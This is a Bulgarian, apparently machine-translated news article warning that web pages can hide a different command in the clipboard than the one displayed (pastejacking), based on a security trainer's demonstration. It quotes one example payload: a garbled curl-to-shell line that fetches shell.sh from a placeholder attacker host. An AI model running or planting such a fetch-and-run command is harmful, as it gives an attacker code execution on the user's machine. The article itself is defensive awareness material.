Как копирането и поставянето може да ви създаде повече проблеми, отколкото си мислите

  • Всички копираме и поставяме от интернет ежедневно, без всъщност да знаем рисковете.
  • Експерт по сигурността отдели време, за да покаже на всички най-лошия сценарий, когато прави това.
  • Поставянето на команди, които сте получили от интернет във вашия терминал, е бърз начин да бъдете хакнати
  • Командите, които смятате, че поставяте във вашия терминал, всъщност са злонамерени кодове.
хакер

Вярно е, че живеем в ера, в която скоростта е всичко, а постигането на бързи резултати е всичко, което има значение. Въпреки това, малко хора всъщност спират за секунда и мислят за последствията.

Ежедневно милиони програмисти, администратори и изследователи по сигурността изпълняват прости задачи като копиране и поставяне на команди от уеб страници директно в конзолите на своите компютри.

Въпреки че мнозина дори не се замислят за това, последствията са по-големи и по-опасни, отколкото може да си помислите в началото, особено ако съхранявате чувствителни или ценни данни.

Известен експерт по сигурността отдели време да сподели какво всъщност може да се случи ако копирате и поставите съдържание от уеб страници.

Copy+Paste е лесен начин наистина да бъдете хакнат

Габриел Фридлендър, който е основател на платформата за обучение по сигурността Wizer, свали корицата от схема, която ще ви накара да помислите два пъти, преди да копирате и поставите команди от уеб страници.

Копирането и поставянето на съдържание от интернет стана толкова често срещано в днешно време, че никой дори не се замисля.

Въпреки това Фридлендър предупреждава, че някои уеб страници са по-измамни, отколкото човек може да осъзнае в началото и това, което смятате, че сте копирали от него, е много различно от това, което всъщност сте направили.

И по-лошото във всичко това е, че без необходимите знания или насоки, жертвите осъзнават грешката си едва след поставянето на текста, в който момент вече може да е твърде късно.

Анализаторът по сигурността също измисли малък тест за читателите на своя блог, само за да могат хората да разберат колко лесно е за вас да отворите неволно вратата за киберпрестъпници.

Той предостави команда, която е предназначена за копиране, но истината се разкрива само когато поставите текста и видите какво всъщност сте въвели във вашата настройка.

След като копирате командата, показана на екранната снимка по-горе, резултатът от поставянето й ще ви шокира, тъй като е далеч от това, което сте мислили, че дублирате.

къдрица http://attacker-domain: 8000/shell.sh | ш

Освен напълно различната команда, присъстваща във вашия клипборд, символът за нов ред (или връщане) at краят му означава, че горният пример ще се изпълни веднага след като бъде поставен директно в Linux терминал.

Така че по-добре бъдете по-наясно какво всъщност се случва и третирайте това като сериозна опасност за безопасността. Не казваме, че всички уебсайтове крият злонамерено съдържание, но си струва да вземем това под внимание.

Случвало ли ви се е да сте били хакнати от поставяне на хитри команди във вашия терминал? Споделете своя опит с нас в секцията за коментари по-долу.

Gitpaste-12 зловредният софтуер ви насочва към GitHub

Gitpaste-12 зловредният софтуер ви насочва към GitHubЗловреден софтуер

Linux базирани x86 сървъри и Linux ARM / MIPS базирани IoT устройства могат да се превърнат в цел на Gitpaste-12.Gitpaste-12 е нов червей, който използва GitHub и Pastebin. Погледнете по-долу, за д...

Прочетете още
Неизвестната уязвимост за нулев ден засяга всички версии на Windows, изходният код се предлага за $ 90 000

Неизвестната уязвимост за нулев ден засяга всички версии на Windows, изходният код се предлага за $ 90 000Зловреден софтуерКибер защита

Microsoft се гордее, че и двете си Windows 10 и Преглед на ръбаr са най-сигурните системи в света. Всички обаче знаем, че няма такова нещо като софтуер, защитен от злонамерен софтуер, и наскоро отк...

Прочетете още
SUPERAntiSpyware срещу Malwarebytes: Кой трябва да използвате?

SUPERAntiSpyware срещу Malwarebytes: Кой трябва да използвате?Зловреден софтуерПремахване на злонамерен софтуер

Премахването на зловреден софтуер не е лесна задача и много потребители се чудят кой инструмент е по-добър за премахване на зловреден софтуер, SUPERAntiSpyware или Malwarebytes?SUPERAntiSpyware пре...

Прочетете още